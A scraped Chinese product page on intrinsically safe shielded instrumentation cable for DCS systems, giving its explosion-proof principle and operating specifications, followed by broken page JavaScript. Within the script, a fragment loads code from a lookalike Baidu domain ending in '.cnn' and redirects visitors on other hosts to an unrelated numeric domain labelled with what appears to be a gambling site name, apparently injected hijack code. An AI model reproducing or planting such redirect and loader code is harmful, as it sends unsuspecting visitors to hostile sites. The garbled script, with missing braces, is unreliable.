本质安全型是电气设备的一种防爆型式,它将设备内部和暴露于潜在爆炸性环境的连接导线可能产生的电火花或热效应能量限制在不能产生点燃的水平。
通过控制设备本身能量水平,使其在正常工作或故障条件下均低于点燃爆炸性气体的临界条件,不至产生火花或高于点燃爆炸性气体的温度,而不用通过其他方式屏蔽或阻拦。
通过限制电气设备电路的各种参数,或采取保护措施来限制电路的火花放电能量和热能,使其在正常工作和规定的故障状态下产生的电火花和热效应均不能点燃周围环境的爆炸性混合物,从而实现了电气防爆,这种电气设备的电路本身就具有防爆性能,也就是从“本质”上就是安全的,故称为本质安全型。
本安计算机用屏蔽电缆(或称本安DCS系统用电缆)适用于石油、化工、电力、煤气工程、矿山等存在爆炸危险的场合以及其它防爆安全要求较高的场合,传输自动控制信号。该电缆具有低电容、低电感集散型仪表信号电缆,简称本安DCS系统用电缆,具有优异的屏蔽性能和抗干扰性能,因此防爆安全性能明显高于一般DCS系统电缆和计算机控制电缆。
使用特性
1、交流额定电压U0/U:300/500V
2、电缆导体长期允许最高工作温度:聚氯乙烯绝缘为70℃;交联聚乙烯绝缘为90℃;无卤低烟阻燃聚烯烃绝缘为70℃。
3、最l低环境温度:固定敷设-40℃;非固定敷设-15℃;安装敷设时环境温度:不低于0℃。
4、电缆允许弯曲半径:非铠装、编织屏蔽电缆不小于电缆外径的6倍;铜带屏蔽、铠装电缆不小于电缆外径的12倍。
else {
bp.src = 'http://push.zhanzhang.baidu.cnn/push.js';
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
)();
if (document.location.host.indexOf("ybzhan.cn")==-1 && document.location.host.indexOf("192.168.")==-1 && document.location.host.indexOf("10.115.")==-1) {
location.href = location.href.replace(document.location.host, 'www.284719.com');
九五至尊网站
分享至
function share(types) {
var title, imageUrl, url, description, keywords;
//获取文章标题
title = document.title;
//获取隐藏域中的图片地址
try {
imageUrl = document.getElementById("shareimg").innerHTML;
catch (e) {
imageUrl = "";
//假如图片为空获取网页中的第一张图片地址作为分享图
if (imageUrl == "") {
try {
imageUrl = document.images[0].src;
catch (e) {
imageUrl = "";
//获取当前网页url
url = document.location.href;
url = url.replace("html#", "html");
try {
//获取网页描述
description = document.querySelector('meta[name="description"]').getAttribute('content');
catch (e) {
description = "";
try {
//获取网页关键字
keywords = document.querySelector('meta[name="keywords"]').getAttribute('content');
catch (e) {
keywords = "";
//qq空间接口的传参
if (types == 'qzone') {
window.open('https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=' + url + '&title=' + title + '&pics=' + imageUrl + '&summary=' + description);
//新浪微博接口的传参
if (types == 'weibo') {
window.open('http://service.weibo.com/share/share.php?appkey=583395093&url=' + url + '&title=' + title + '&pic=' + imageUrl);
// //qq好友接口的传参
// if (types == 'qqim') {
// window.open('http://connect.qq.com/widget/shareqq/index.html?url=' + url + '&title=' + title + '&pics=' + imageUrl + '&summary=' + description + '&desc=' + keywords);
//
//生成二维码给微信扫描分享
if (types == 'weixin' || types == 'qqim') {
//在线二维码(服务器性能限制,仅测试使用,屏蔽非大陆ip访问)
url = url.replace(/-/g, "%2D");
window.open('https://www.a-bm.cn/share.aspx?types=' + types + '&url=' + url);
document.write("")